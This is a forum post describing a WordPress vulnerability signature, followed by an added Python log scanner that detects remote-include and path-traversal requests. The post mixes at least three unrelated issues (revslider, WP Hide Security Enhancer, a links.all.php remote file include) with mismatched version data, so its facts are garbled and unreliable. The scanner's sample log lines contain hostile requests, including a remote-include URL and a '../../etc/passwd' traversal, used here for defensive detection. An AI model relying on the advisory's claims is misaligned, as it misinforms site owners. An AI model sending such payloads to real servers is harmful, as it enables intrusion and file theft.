
Author Topic: ET WEB_SPECIFIC_APPS WP Generic revslider Arbitrary File Download  (Read 2463 times)


nidhinjo

  • Guest
The remote WordPress server utilizes a third-party plugin which is prone to an arbitrary file download vulnerability. WP Hide Security Enhancer version 1.3.9.2 or less is a victim of an Arbitrary File Download vulnerability. This allows any visitor to download any file in our installation. This signature detects HTTP requests that attempt to exploit a remote file include vulnerability in the WordPress links.all.php script. WordPress allows users to generate news pages and weblogs dynamically. It uses PHP and a MySQL database to generate dynamic pages.

A vulnerability has been reported for WordPress. The problem is said to occur due to insufficient sanitization of user-supplied URI parameters. Specifically, the '$abspath' variable, which is used as an argument to the PHP require() function, is not sufficiently sanitized of malicious input. As a result, an attacker may be capable of including a malicious 'blog.header.php' from a controlled web server. This may result in the execution of PHP commands located within the script. Successful exploitation of this vulnerability would allow an attacker to execute arbitrary PHP commands on a target server, with the privileges of WordPress.

Severity: High

This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening.

Affected

WordPress versions below 3.7.6

Solution

Upgrade to the latest WordPress version.
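As an added example (not part of the post above, and not the ET rule itself), the check below shows the kind of logic such a signature applies: it scans access-log lines for requests to the links.all.php script whose abspath parameter carries a remote URL (the remote file include shape the post describes) or a directory traversal (the arbitrary file download shape). The log lines, IP addresses and the parameter name `abspath` are constructed for this illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format log lines; none of these are real requests.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /wp-links/links.all.php?abspath=http://198.51.100.7/ HTTP/1.1" 200 512 "-" "curl/7.88"
203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /wp-links/links.all.php?abspath=https%3A%2F%2F198.51.100.7%2F HTTP/1.1" 200 512 "-" "curl/7.88"
192.0.2.1 - - [10/Oct/2023:13:57:12 +0000] "GET /index.php?p=12 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
192.0.2.2 - - [10/Oct/2023:13:58:40 +0000] "GET /wp-links/links.all.php?abspath=../../etc/passwd HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method and request target.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')

# Value shapes that make a require()/include() argument dangerous:
# a scheme-prefixed URL (remote file include) or a ".." hop out of the web root.
REMOTE_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.IGNORECASE)
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')


def classify_value(value):
    """Return 'remote_include', 'path_traversal' or None for one decoded parameter value."""
    if REMOTE_RE.match(value):
        return "remote_include"
    if TRAVERSAL_RE.search(value):
        return "path_traversal"
    return None


def scan_log(text, script="links.all.php", param="abspath"):
    """Return (ip, kind, value) for requests to `script` whose `param` looks malicious."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/" + script):
            continue
        # parse_qs percent-decodes, so the encoded https%3A%2F%2F variant is caught too
        for value in parse_qs(parts.query, keep_blank_values=True).get(param, []):
            kind = classify_value(value)
            if kind:
                findings.append((m.group("ip"), kind, value))
    return findings


if __name__ == "__main__":
    for ip, kind, value in scan_log(SAMPLE_LOG):
        print(f"{ip}\t{kind}\t{value}")
```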